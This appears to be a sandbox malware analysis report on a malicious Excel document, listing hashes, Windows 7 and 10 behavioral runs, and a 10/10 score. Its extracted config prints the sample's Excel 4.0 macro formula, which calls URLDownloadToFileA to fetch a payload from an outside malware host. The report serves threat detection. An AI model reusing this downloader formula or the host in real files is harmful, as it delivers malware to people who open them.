General
-
Target
this_issue (74).zip
-
Size
11KB
-
Sample
210305-z4hdat5hzs
-
MD5
bb7b00cde705ee43343e0a0e05182ca3
-
SHA1
74350d46d4f32913e085de4e797099c6ba7ea5de
-
SHA256
4d06324eecb613b38d794f04d701378645a28f9e87b1056b95339323c150d93c
-
SHA512
77e70f0bd3157b7dd5668b3c854a5a9a91dd3c94f1ffd5fda60a01da68de6ac0bfc40c4c936b165cdcc86035f8fdecfb1f292a70e11029b6f46238cd6d6cf37c
Behavioral task
behavioral1
Sample
document-630335192.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
document-630335192.xls
Resource
win10v20201028
Malware Config
Extracted
http://dzw10jpcgj03fckc.com/inda.xls
-
formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://dzw10jpcgj03fckc.com/inda.xls","..\fkruf.djr",0)
Extracted
http://dzw10jpcgj03fckc.com/inda.xls
Targets
-
-
Target
document-630335192.xls
-
Size
39KB
-
MD5
7f32e36c3a4ab9b3c2cb70cdd7232a97
-
SHA1
19a8b5279606ef888421ed4482f4222a184b6313
-
SHA256
64d8b1c5f101aca6c0f3e6b31e12bc2acef52ae9ab490b07ed5e228ed43aefd0
-
SHA512
98ee0d78a0ed8ba81a5b9bce1a4745d99d9351ddc3eee6be76f5f3386cffe07bbb30a6e65a1e7cad6b5fdc47af21fd7a88fe4bbcae0e7c0667cfd3d65f63f002
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-